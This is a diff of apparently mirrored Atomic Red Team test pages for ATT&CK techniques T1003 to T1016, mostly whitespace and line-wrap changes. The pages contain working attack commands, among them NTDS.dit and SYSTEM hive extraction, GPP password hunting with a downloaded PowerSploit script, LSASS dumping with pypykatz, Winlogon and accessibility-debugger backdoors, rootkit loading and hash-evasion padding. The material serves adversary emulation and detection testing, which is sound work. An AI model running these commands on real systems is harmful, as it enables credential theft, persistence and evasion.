## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit". -A successful test also requires the export of the SYSTEM Registry hive. +A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit 
@@ -694,250 +691,268 @@ reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE ``` #### Cleanup Commands: + ```cmd del "#{extract_path}\ntds.dit" >nul 2> nul del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul ``` - - #### Dependencies: Run with `command_prompt`! + ##### Description: Target must be a Domain Controller + ##### Check Prereq Commands: + ```cmd reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` + ##### Get Prereq Commands: + ```cmd echo Sorry, Promoting this machine to a Domain Controller must be done manually ``` + ##### Description: Volume shadow copy must exist + ##### Check Prereq Commands: + ```cmd if not exist #{vsc_name} (exit /b 1) ``` + ##### Get Prereq Commands: + ```cmd echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement ``` + ##### Description: Extract path must exist + ##### Check Prereq Commands: + ```cmd if not exist #{extract_path} (exit /b 1) ``` + ##### Get Prereq Commands: + ```cmd mkdir #{extract_path} ``` - - -

## Atomic Test #13 - GPP Passwords (findstr) -Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -**Supported Platforms:** Windows +Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be +decrypted with gpp-decrypt on Kali Linux. +**Supported Platforms:** Windows - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd findstr /S cpassword %logonserver%\sysvol\*.xml ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must be domain joined + ##### Check Prereq Commands: + ```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Joining this computer to a domain must be done manually ``` - - -

## Atomic Test #14 - GPP Passwords (Get-GPPPassword) + Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. -Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". +Successful test execution will either display the credentials found in the GPP files or indicate "No preference files +found". **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1| | gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell . #{gpp_script_path} Get-GPPPassword -Verbose ``` - - - #### Dependencies: Run with `powershell`! 
+ ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} + ##### Check Prereq Commands: + ```powershell if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } ``` + ##### Get Prereq Commands: + ```powershell New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" ``` + ##### Description: Computer must be domain joined + ##### Check Prereq Commands: + ```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Joining this computer to a domain must be done manually ``` - - -

## Atomic Test #15 - LSASS read with pypykatz + Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. - **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd pypykatz live lsa ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must have python 3 installed + ##### Check Prereq Commands: + ```powershell if (python --version) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "Python 3 must be installed manually" ``` + ##### Description: Computer must have pip installed + ##### Check Prereq Commands: + ```powershell if (pip3 -V) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "PIP must be installed manually" ``` + ##### Description: pypykatz must be installed and part of PATH + ##### Check Prereq Commands: + ```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell pip3 install pypykatz ``` - - -

## Atomic Test #16 - Registry parse with pypykatz + Parses registry hives to obtain stored credentials **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd pypykatz live registry ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must have python 3 installed + ##### Check Prereq Commands: + ```powershell if (python --version) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "Python 3 must be installed manually" ``` + ##### Description: Computer must have pip installed + ##### Check Prereq Commands: + ```powershell if (pip3 -V) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell echo "PIP must be installed manually" ``` + ##### Description: pypykatz must be installed and part of PATH + ##### Check Prereq Commands: + ```powershell if (cmd /c pypykatz -h) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell pip3 install pypykatz ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1004.md b/Atomic_Threat_Coverage/Triggers/T1004.md
index 27df95f3..a8876594 100644
--- a/Atomic_Threat_Coverage/Triggers/T1004.md
+++ b/Atomic_Threat_Coverage/Triggers/T1004.md
@@ -1,14 +1,19 @@
 # T1004 - Winlogon Helper DLL
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
+
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) -Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) +Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. +Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg +Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on -Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.
+Adversaries may take advantage of these features to repeatedly execute malicious code and establish +Persistence. ## Atomic Tests @@ -18,97 +23,82 @@ Adversaries may take advantage of these features to repeatedly execute malicious - [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell) -
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. -Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. +Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon +logon/logoff. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force @@ -116,12 +106,9 @@ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\No ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1005.md b/Atomic_Threat_Coverage/Triggers/T1005.md
index 82b5e651..c7750a8b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1005.md
+++ b/Atomic_Threat_Coverage/Triggers/T1005.md
@@ -1,44 +1,42 @@
 # T1005 - Data from Local System
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1005)
+
Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. -Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. +Adversaries will often search the file system on computers they have compromised to find files of interest. They may do +this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such +as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather +information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the +local system.
## Atomic Tests - [Atomic Test #1 - Search macOS Safari Cookies](#atomic-test-1---search-macos-safari-cookies) -
## Atomic Test #1 - Search macOS Safari Cookies -This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. + +This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner +malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. **Supported Platforms:** macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | search_string | String to search Safari cookies to find. | string | coinbase| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1007.md b/Atomic_Threat_Coverage/Triggers/T1007.md
index 0655cf80..a61f701d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1007.md
+++ b/Atomic_Threat_Coverage/Triggers/T1007.md
@@ -1,5 +1,7 @@
 # T1007 - System Service Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
+
Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
## Atomic Tests @@ -8,22 +10,17 @@ - [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe) -
## Atomic Test #1 - System Service Discovery + Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd tasklist.exe @@ -31,44 +28,35 @@ sc query sc query state= all ``` - - - - -

## Atomic Test #2 - System Service Discovery - net.exe -Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. - -Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s - -**Supported Platforms:** Windows +Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple +threat actors. +Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c: +\Windows\Temp\service-list.txt.s +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net.exe start >> #{output_file} ``` #### Cleanup Commands: + ```cmd del /f /q /s #{output_file} >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1009.md b/Atomic_Threat_Coverage/Triggers/T1009.md
index 35b1f67c..83aa7ea9 100644
--- a/Atomic_Threat_Coverage/Triggers/T1009.md
+++ b/Atomic_Threat_Coverage/Triggers/T1009.md
@@ -1,43 +1,42 @@
 # T1009 - Binary Padding
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
+
Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. -Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) +Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and +static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create +junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April +2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not +designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public +file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: +VirusTotal FAQ)
## Atomic Tests - [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd) -
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd + Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1010.md b/Atomic_Threat_Coverage/Triggers/T1010.md
index 4e4ac075..c2943912 100644
--- a/Atomic_Threat_Coverage/Triggers/T1010.md
+++ b/Atomic_Threat_Coverage/Triggers/T1010.md
@@ -1,35 +1,35 @@
 # T1010 - Application Window Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
+
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. -In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.
+In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) +script. ## Atomic Tests - [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net) -
## Atomic Test #1 - List Process Main Windows - C# .NET + Compiles and executes C# code to list main window titles associated with each process. -Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. +Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and +execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | $env:TEMP\T1010.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} @@ -37,25 +37,26 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} # ``` #### Cleanup Commands: + ```cmd del /f /q /s #{output_file_name} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1012.md b/Atomic_Threat_Coverage/Triggers/T1012.md
index e9a5b9fe..c9b1f9ed 100644
--- a/Atomic_Threat_Coverage/Triggers/T1012.md
+++ b/Atomic_Threat_Coverage/Triggers/T1012.md
@@ -1,20 +1,27 @@
 # T1012 - Query Registry
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
+
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. -The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+The Registry contains a significant amount of information about the operating system, configuration, software, and +security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation +within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) +during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target +and/or attempts specific actions. ## Atomic Tests - [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry) -
## Atomic Test #1 - Query Registry + Query Windows Registry. -Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). +Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent +upon OS). References: @@ -28,12 +35,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" @@ -57,9 +59,4 @@ reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1014.md b/Atomic_Threat_Coverage/Triggers/T1014.md
index 24e7127b..c4dfbc17 100644
--- a/Atomic_Threat_Coverage/Triggers/T1014.md
+++ b/Atomic_Threat_Coverage/Triggers/T1014.md
@@ -1,8 +1,12 @@
 # T1014 - Rootkit
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
+
Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit) -Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
+Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other +system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux +Rootkit) (Citation: BlackHat Mac OSX Rootkit) ## Atomic Tests @@ -12,68 +16,52 @@ Adversaries may use rootkits to hide the presence of programs, files, network co - [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test) -
## Atomic Test #1 - Loadable Kernel Module based Rootkit + Loadable Kernel Module based Rootkit **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo insmod #{rootkit_file} ``` - - - - -

## Atomic Test #2 - Loadable Kernel Module based Rootkit + Loadable Kernel Module based Rootkit **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo modprobe #{rootkit_file} ``` - - - - -

## Atomic Test #3 - Windows Signed Driver Rootkit Test + This test exploits a signed driver to execute code in Kernel. SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: @@ -85,25 +73,16 @@ It would be wise if you only run this in a test environment **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd puppetstrings #{driver_path} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1015.md b/Atomic_Threat_Coverage/Triggers/T1015.md index 95fc877b..4cd79836 100644 --- a/Atomic_Threat_Coverage/Triggers/T1015.md +++ b/Atomic_Threat_Coverage/Triggers/T1015.md @@ -1,14 +1,31 @@ # T1015 - Accessibility Features -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1015) -
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. - -Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) -Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1015) -For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) +
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. -For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) +Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed +five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. +The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access +through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) + +Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code +integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, +the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection ( +WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because +it does not require the corresponding accessibility feature binary to be replaced. 
Examples for both methods: + +For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the +program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that +provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at +the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the +replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014) + +For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key +may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the +accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at +the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with +SYSTEM privileges. (Citation: Tilbury 2014) Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys) @@ -22,28 +39,25 @@ Other accessibility features exist that may also be leveraged in a similar fashi - [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes) -
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes -Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. + +Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of +executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe| | attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:\windows\system32\cmd.exe| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $input_table = "#{parent_list}".split(",") @@ -65,6 +79,7 @@ Foreach ($item in $input_table){ ``` #### Cleanup Commands: + ```powershell $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) @@ -74,8 +89,4 @@ Foreach ($item in $input_table) } ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1016.md b/Atomic_Threat_Coverage/Triggers/T1016.md index 5fd7d098..0e21076e 100644 --- a/Atomic_Threat_Coverage/Triggers/T1016.md +++ b/Atomic_Threat_Coverage/Triggers/T1016.md @@ -1,8 +1,13 @@ # T1016 - System Network Configuration Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016) +
